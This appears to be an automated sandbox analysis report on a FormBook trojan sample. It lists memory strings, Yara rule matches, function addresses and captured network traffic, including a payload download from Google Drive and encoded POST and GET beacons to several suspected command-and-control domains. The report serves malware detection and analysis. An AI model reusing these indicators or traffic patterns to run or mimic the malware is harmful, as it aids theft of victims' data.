        Source: explorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4262862311.0000000004E18000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5570670853.0000000004E18000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-de/sport/fussball/dfb-pokal
        Source: explorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4262862311.0000000004E18000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5570670853.0000000004E18000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-de/sport/fussball/england
        Source: explorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4262862311.0000000004E18000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5570670853.0000000004E18000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-de/sport/fussball/frankreich
        Source: explorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4262862311.0000000004E18000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5570670853.0000000004E18000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-de/sport/fussball/soccer-international-world-cup-women
        Source: explorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4262862311.0000000004E18000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5570670853.0000000004E18000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-de/sport/fussball/spanien
        Source: explorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4262862311.0000000004E18000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5570670853.0000000004E18000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-de/sport/fussball/uefa-europa-league
        Source: explorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4262862311.0000000004E18000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5570670853.0000000004E18000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-de/sport/motorsport/motogp/renn-kalender
        Source: explorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4262862311.0000000004E18000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5570670853.0000000004E18000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-de/sport/motorsport/nascar/renn-kalender
        Source: explorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-de/unterhaltung/news/herzogin-meghan-r
        Source: explorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-de/unterhaltung/other/c
        Source: explorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-de/wetter/topgeschichten/mega-sturm-kommt-meteorologe-warnt-darum-wird-es-leb
        Source: explorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/de-de/feed
        Source: RAVCpl64.exe, 00000003.00000002.5568062940.00000000048E2000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5572571425.0000000007860000.00000004.00000800.00020000.00000000.sdmp, msdt.exe, 00000004.00000002.5570292945.0000000005FF2000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.5600769418.0000000013D02000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.nic.ru/catalog/domains/
        Source: RAVCpl64.exe, 00000003.00000002.5568062940.00000000048E2000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5572571425.0000000007860000.00000004.00000800.00020000.00000000.sdmp, msdt.exe, 00000004.00000002.5570292945.0000000005FF2000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.5600769418.0000000013D02000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.nic.ru/catalog/hosting/
        Source: RAVCpl64.exe, 00000003.00000002.5568062940.00000000048E2000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5572571425.0000000007860000.00000004.00000800.00020000.00000000.sdmp, msdt.exe, 00000004.00000002.5570292945.0000000005FF2000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.5600769418.0000000013D02000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.nic.ru/catalog/hosting/dedicated/
        Source: RAVCpl64.exe, 00000003.00000002.5568062940.00000000048E2000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5572571425.0000000007860000.00000004.00000800.00020000.00000000.sdmp, msdt.exe, 00000004.00000002.5570292945.0000000005FF2000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.5600769418.0000000013D02000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.nic.ru/catalog/hosting/shared/
        Source: RAVCpl64.exe, 00000003.00000002.5568062940.00000000048E2000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5572571425.0000000007860000.00000004.00000800.00020000.00000000.sdmp, msdt.exe, 00000004.00000002.5570292945.0000000005FF2000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.5600769418.0000000013D02000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.nic.ru/catalog/hosting/vds-vps/
        Source: RAVCpl64.exe, 00000003.00000002.5568062940.00000000048E2000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5572571425.0000000007860000.00000004.00000800.00020000.00000000.sdmp, msdt.exe, 00000004.00000002.5570292945.0000000005FF2000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.5600769418.0000000013D02000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.nic.ru/catalog/ssl/
        Source: RAVCpl64.exe, 00000003.00000002.5568062940.00000000048E2000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5570292945.0000000005FF2000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.5600769418.0000000013D02000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.nic.ru/hcp
        Source: explorer.exe, 00000005.00000002.5600769418.0000000013D02000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.nic.ru/hcp2/sites/www.legalinmedia.online/?leg4590245
        Source: RAVCpl64.exe, 00000003.00000002.5568062940.0000000004750000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5570292945.0000000005E60000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.5600769418.0000000013B70000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.openlend.lat/aw8o/?1NM6e=JwP18BaQn2gAMbwzAk/tzHq1rHqPkgowxzXz/N2AVg5llpqPoDBUT4Fbw9qJesV
        Source: RAVCpl64.exe, 00000003.00000002.5568062940.00000000048E2000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5570292945.0000000005FF2000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.5600769418.0000000013D02000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://yastatic.net/pcode/adfox/loader.js
        Source: unknownHTTP traffic detected: POST /aw8o/ HTTP/1.1Host: www.handsome-sex.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brOrigin: http://www.handsome-sex.comReferer: http://www.handsome-sex.com/aw8o/Connection: closeContent-Length: 186Content-Type: application/x-www-form-urlencodedCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like GeckoData Raw: 31 4e 4d 36 65 3d 77 78 6d 35 47 4f 41 34 65 4e 6b 78 68 75 5a 62 62 6b 4b 58 4d 59 38 42 33 34 49 6c 56 32 42 79 7a 61 41 75 7a 6e 61 6a 53 50 74 7a 6b 76 65 58 74 6e 32 5a 7a 6a 66 61 43 6a 73 39 54 39 68 5a 59 58 71 53 5a 4a 44 4f 78 34 69 66 41 77 4f 55 50 2b 52 31 62 4c 38 51 53 4e 43 42 72 32 43 71 74 55 45 6a 61 36 54 72 4f 6b 58 47 79 41 4c 65 71 71 68 78 73 64 49 72 4d 7a 70 49 52 62 50 65 4f 6b 64 54 70 6a 41 65 44 54 42 38 56 7a 4d 66 67 42 39 68 64 55 32 47 33 30 32 72 31 57 78 4c 30 69 39 64 2b 79 74 69 32 64 4d 6e 75 51 49 39 46 77 3d 3d Data Ascii: 1NM6e=wxm5GOA4eNkxhuZbbkKXMY8B34IlV2ByzaAuznajSPtzkveXtn2ZzjfaCjs9T9hZYXqSZJDOx4ifAwOUP+R1bL8QSNCBr2CqtUEja6TrOkXGyALeqqhxsdIrMzpIRbPeOkdTpjAeDTB8VzMfgB9hdU2G302r1WxL0i9d+yti2dMnuQI9Fw==
        Source: unknownDNS traffic detected: queries for: drive.google.com
        Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1ac1-oEkoP2YeI5Q4arlxAmDDETDNVAGt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: drive.google.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/8tk9bkcje0otiv862ca41hvnkh9akt9l/1691655375000/10072219387490488252/*/1ac1-oEkoP2YeI5Q4arlxAmDDETDNVAGt?e=download&uuid=6226759b-1077-47f6-8c73-64f4b8b57f79 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Cache-Control: no-cacheHost: doc-0g-2c-docs.googleusercontent.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /aw8o/?P4=_n5TPHiTKZj&1NM6e=UdSYgafQlh0t2NPJFWsJTuyq7bpxDbJ0k4ok7GV9MtKriqrdB2GNDlXOyj3801N/gTxArORLFOT1XOkGkvvmtP3cZGRd+UEGYg== HTTP/1.1Host: www.kepaoqin.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
        Source: global trafficHTTP traffic detected: GET /aw8o/?1NM6e=9zOZF6sYY9k/tdVrbXWkN8sA2agMahsOyqxI7TXZC8QU+v+BgRTEySnaHWgeO9Bnd0OQd62k8t+QBgqfLMlzOLISTcCK1ibTiw==&P4=_n5TPHiTKZj HTTP/1.1Host: www.handsome-sex.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
        Source: global trafficHTTP traffic detected: GET /aw8o/?P4=_n5TPHiTKZj&1NM6e=4wyyFbo3wf4GPkojX9lv2Hi85TpF3a9bJFCVb7ujVjad/QnKgAM8Rmx0lfLSMwhbZvHAQ1fpLn066tx6/q5vMcOgf2mjw6QkIA== HTTP/1.1Host: www.sonokmall.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
        Source: global trafficHTTP traffic detected: GET /aw8o/?1NM6e=taxf5j588OeYZZ7u8xH1eBnKDxsrb249ZHPrEnAhG3HGAn0ZxHMys4uYbZGY9eDFVkb7zYlxcXM3bVIeT/ayzX9aM5XiamXyxQ==&P4=_n5TPHiTKZj HTTP/1.1Host: www.zenturasolutions.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
        Source: global trafficHTTP traffic detected: GET /aw8o/?P4=_n5TPHiTKZj&1NM6e=1Jf62kTrmMrtvW9nTGcQzL1qxjpfbwlqHSE5+yviuOiwQb8X0elvNWjLUSKlufaHfU8RKiOE6AarqIMWhrvJVzj6gCO1stp4zw== HTTP/1.1Host: www.wolfcapital.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
        Source: global trafficHTTP traffic detected: GET /aw8o/?1NM6e=JwP18BaQn2gAMbwzAk/tzHq1rHqPkgowxzXz/N2AVg5llpqPoDBUT4Fbw9qJesVKC8w5QoNuWE8SYi183Rf2cdVRH8sDFcjA1Q==&P4=_n5TPHiTKZj HTTP/1.1Host: www.openlend.latAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
        Source: global trafficHTTP traffic detected: GET /aw8o/?P4=_n5TPHiTKZj&1NM6e=csQIKxSiAps2oY2HkWP4m2UAXHoJbYdtF0OMXDtSslnXYUx4jfx20xSs5MiYBfJn4Wt0LZQ+kGwlvq1TpxG6ruHpMlvoexuWNA== HTTP/1.1Host: www.legalinmedia.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
        Source: global trafficHTTP traffic detected: GET /aw8o/?1NM6e=JHyqG6c0VkX+12EdRRnMiv591CJu3XVJOhv6jqyuy3yB/QILPRQMYUaLAuC7PLR0Wsfx0havIXAbx1R+v/HWlYVUV6jOtwoJGQ==&P4=_n5TPHiTKZj HTTP/1.1Host: www.ladakhzesmo.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
        Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.11.20:49715 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 142.250.185.129:443 -> 192.168.11.20:49716 version: TLS 1.2
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 0_2_00404A35 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageA,CreatePopupMenu,LdrInitializeThunk,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,LdrInitializeThunk,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,LdrInitializeThunk,SetClipboardData,CloseClipboard,0_2_00404A35

        E-Banking Fraud

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000002.00000002.3794736895.00000000339B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.5562833277.00000000049C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.5562454936.0000000004980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.5559916396.0000000002B60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: 00000002.00000002.3794736895.00000000339B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000004.00000002.5562833277.00000000049C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000004.00000002.5562454936.0000000004980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000004.00000002.5559916396.0000000002B60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: fjerbregners_patrol.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: 00000002.00000002.3794736895.00000000339B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000004.00000002.5562833277.00000000049C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000004.00000002.5562454936.0000000004980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000004.00000002.5559916396.0000000002B60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 0_2_0040360D EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,LdrInitializeThunk,SetCurrentDirectoryA,LdrInitializeThunk,CopyFileA,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,0_2_0040360D
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 0_2_0040432F0_2_0040432F
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 0_2_00406EAE0_2_00406EAE
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 0_2_6EE822880_2_6EE82288
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CF13802_2_33CF1380
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DBF3302_2_33DBF330
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CED2EC2_2_33CED2EC
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DB124C2_2_33DB124C
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CC12102_2_33CC1210
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D051C02_2_33D051C0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D1B1E02_2_33D1B1E0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D4717A2_2_33D4717A
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CEF1132_2_33CEF113
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D9D1302_2_33D9D130
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D0B0D02_2_33D0B0D0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DB70F12_2_33DB70F1
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D3508C2_2_33D3508C
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DBF6F62_2_33DBF6F6
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D736EC2_2_33D736EC
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DAD6462_2_33DAD646
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D9D62C2_2_33D9D62C
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DBF5C92_2_33DBF5C9
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DB75C62_2_33DB75C6
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D6D4802_2_33D6D480
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D3DB192_2_33D3DB19
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DBFB2E2_2_33DBFB2E
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DBFA892_2_33DBFA89
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D1FAA02_2_33D1FAA0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D459C02_2_33D459C0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CC99E82_2_33CC99E8
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DB18DA2_2_33DB18DA
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DB78F32_2_33DB78F3
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D798B22_2_33D798B2
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D098702_2_33D09870
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D1B8702_2_33D1B870
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D758702_2_33D75870
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DBF8722_2_33DBF872
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D038002_2_33D03800
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DB1FC62_2_33DB1FC6
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D7FF402_2_33D7FF40
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DBFF632_2_33DBFF63
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DB9ED22_2_33DB9ED2
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D01EB22_2_33D01EB2
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D09DD02_2_33D09DD0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D9FDF42_2_33D9FDF4
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DB7D4C2_2_33DB7D4C
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DBFD272_2_33DBFD27
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D87CE82_2_33D87CE8
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D1FCE02_2_33D1FCE0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D99C982_2_33D99C98
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CC1C9F2_2_33CC1C9F
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D03C602_2_33D03C60
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D0E3102_2_33D0E310
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CC22452_2_33CC2245
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CC017A2_2_33CC017A
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DC010E2_2_33DC010E
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CF00A02_2_33CF00A0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DAE0762_2_33DAE076
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DB67572_2_33DB6757
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D0A7602_2_33D0A760
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D027602_2_33D02760
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DBA6C02_2_33DBA6C0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D006802_2_33D00680
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D246702_2_33D24670
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: String function: 33D47BE4 appears 68 times
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: String function: 33D7EF10 appears 46 times
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: String function: 33CEB910 appears 176 times
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: String function: 33D6E692 appears 60 times
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D334E0 NtCreateMutant,LdrInitializeThunk,2_2_33D334E0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D338D0 NtGetContextThread,LdrInitializeThunk,2_2_33D338D0
